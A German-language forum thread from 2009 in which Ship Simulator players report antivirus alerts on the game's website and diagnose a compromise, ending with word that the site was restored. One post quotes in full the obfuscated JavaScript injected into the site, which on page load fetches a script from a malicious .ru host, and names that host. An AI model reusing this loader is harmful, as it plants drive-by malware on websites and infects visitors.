Ship Simulator
German forum => Schiff-Simulator 2008 => Allgemeines Forum => Topic started by: danielschunk on December 26, 2009, 19:51:01
-
Hallo in die Runde,
wenn ich die Webseite vom Schiff-Simulator aufrufe, meldet sich Kaspersky bei mir mit einem Trojaner-Fund (siehe Screenshot). Anbei poste ich mal den Log-Eintrag von Kaspersky:
26.12.2009 19:48:31 Gefunden: Trojan-Clicker.JS.Iframe.db Firefox http://met-art-com.koubei.com.mpnrs-com.theatticsale.ru:8080/mihanblog.com/mihanblog.com/baixing.com/google.com/travian.ae/
Hat das noch jemand beobachtet? Oder ist das am Ende nur ein Fehlalarm von Kaspersky ???
Gruß, Daniel
-
Das gleiche passiert bei mir auch. (G Data)
Werde dies weiter an VSTEP berichten, falls die nicht schon bescheid wissen.
Danke & Gruss
Sturmfahrt
-
Moin Sturmfahrt
Ich habe ebenfalls G Data welches sagt:
Virus: Exploit.PDF-JS.Gen (Engine A)
Datei: ChangeLog.pdf
Verzeichnis: C:\Users\Jens\AppData\Local\Temp\plugtmp
Prozess: navigator.exe
Virus: Exploit.PDF-JS.Gen (Engine A)
Es wurde versucht, auf eine infizierte
Datei zuzugreifen.
Datei: ChangeLog.pdf
Verzeichnis: C:\Users\Jens\AppData\Local\Temp\plugtmp
Gruß Jens
-
Ja ich hatte ähnliche Mysteriöse Erlebnisse :o ::)
Ich habe in meinen FF No Script installiert das hatte mit einmal kam da die Meldung das er eine neue (noch nicht erlaubte) domain blockiert hat zumindest dessen Inhalt.
Domain war erstmal nur theatticsale.ru
Da ich dachte das dies durch ein eingebundenes Medium von shipsim.com (video oder so, diese Meldung von noscript hatte ich auch schon nen paar tage davor gehabt hab es aber erstmal weder erlaubt noch verboten so das es nicht wirken konnte) habe ich es kurz erlaubt, danach öffnete sich Java. etwas später kam von Windows die Meldung das Firefox aus Sicherheitsgründen geschlossen wurde worauf dann der MS Fehlerreport folgte.
Firefox neu gestartet, darauf hin meldete mir noscript "http://met-art-com.koubei.com.mpnrs-com.theatticsale.ru:8080" als noch nicht erlaubte Seite.
diese erlaubnis löste erstmal keine Probleme aus. ich habe mir danach erstmal die einzelnen seiten angeschaut es kamen eigentlich nur leere seiten (Tomcat, Apache) und so was so aus sah als wäre der server erst frisch aufgesetzt wurden oder so.
danach folgte erstmal eine Besichtigung des Quelltextes von shipsim.com, da war kein direkter Hinweis auf auf "http://met-art-com.koubei.com.mpnrs-com.theatticsale.ru:8080 oder theatticsale.ru" zu finden :)
Aber ich fand mysteriös aussehenden Javascript quellcode der faszinierender weise auch noch nach dem "</html> auf tauchte sprich da wo er nicht wirklich hingehört es hat vieles darauf schließen lassen das es ein code in verschlüsselter js form war welcher dann die Url zu den oben genannten seiten bereit stellte.
(kompletter code teil des funds)
</html><script>/*GNU GPL*/ try{window.onload = function(){var Tpr12yo3qwu6wfd = document.createElement('s$@#c)(#&!r$^$i$)&!p!!&t!'.replace(/\^|\$|&|#|\(|@|\!|\)/ig, ''));Tpr12yo3qwu6wfd.setAttribute('type', 'text/javascript');Tpr12yo3qwu6wfd.setAttribute('src', 'h&#t#t(p@&:@#!^/(/@#m#$!e$t#$&-#a&r!&t^)-!##@!c!o($&m$(#.&!@!k(^(&o@!u##^b^(^e^i#^.!c^$o&$m!^.@^m^p!!)n(^$@r!&s@!@-$^^c&o@^m!($.$t^&$h^$&^e!(a#@&t^@t(&#^i$)c^@(s#@(#a(#l$(e@)$!.@)r&u(&:^(^(8@!0)##8##0$(#&/)#($m!@&i)@()h)$^a)@n!^$b@l@$o#(!(g($.$$c!@^o)!!m!&&/@m#!!i$()$h$&a$)#n^^b!!l^(^$o^@@g^@)(.$&)c^^o(#)m)!/^&b@&a!$##i!x!&$^^i)$&^@n$$g)#^.$$(()c(o#)m#!/!&)g@^o$o#^g)!$^l$((&e!(.!!c(o)#(m&#/^t$&!r@#$a#v!)#i)(a#$^n$.!)!&a^)e&(/^$'.replace(/\!|\(|@|#|\)|\$|&|\^/ig, ''));Tpr12yo3qwu6wfd.setAttribute('defer', 'defer');Tpr12yo3qwu6wfd.setAttribute('id', 'M&$($)e&(z(f)(8##j!)^7!$#@8$)t^^g#)j&)&2!#&!9(^)'.replace(/&|\)|\!|\$|#|\(|\^|@/ig, ''));document.body.appendChild(Tpr12yo3qwu6wfd);}} catch(e) {}</script>
Ich hatte schon von Anfang an ein schlechtes Gefühl das diese Seite nicht wirklich zu shipsim gehört.
Eine weitere Google Suche nach "theatticsale.ru" brachte mir folgendes Ergebnis.
http://wwwSpambotadvisor.com/sites/theatticsale.ru/postid/?p=2776016
Bewertung: Browser-Exploit
-
Ist schon merkwürdig,
G-data sperrt bei mir gleich die Seite und verweigert den Zugriff. Es betrifft jedoch nur die Hauptseite, alle anderen Seiten scheinen ok zu sein. Habe die shipyard unter Favoriten, da kommt keine Warnung.
@Danielschunk oder einen Mod, könnte einer den Link zu "Shipsim.com" hier entfernen, muss ja nicht sein das sich da jemand etwas einfängt, nicht alle Virenprogramme erkennen so ein Ungeziefer sofort.
Gruß
david32
-
Ich habe das selbe Problem mit dem Virenscanner.
Ich selbst benutze auch Kaspersky Anti Virus 2010.
Ich hoffe nur das kein Trojaner auf meinem PC ist.
Habe den Virenscanner auch durchlaufen lassen, aber dort wurden keine Bedrohungen gefunden.
das ganze ist schon sehr merkwürdig.
Hoffe das ganze wird schnell behoben.
-
Soeben haben wir die Info von VSTEP bekommen, dass die shipsim webside wieder erreichbar ist.
Die Vieren / Trojaner Attacke wurde abgewehrt und die Sicherheitsvorkehrungen werden ab morgen nochmals verschärft.
Gruss
Sturmfahrt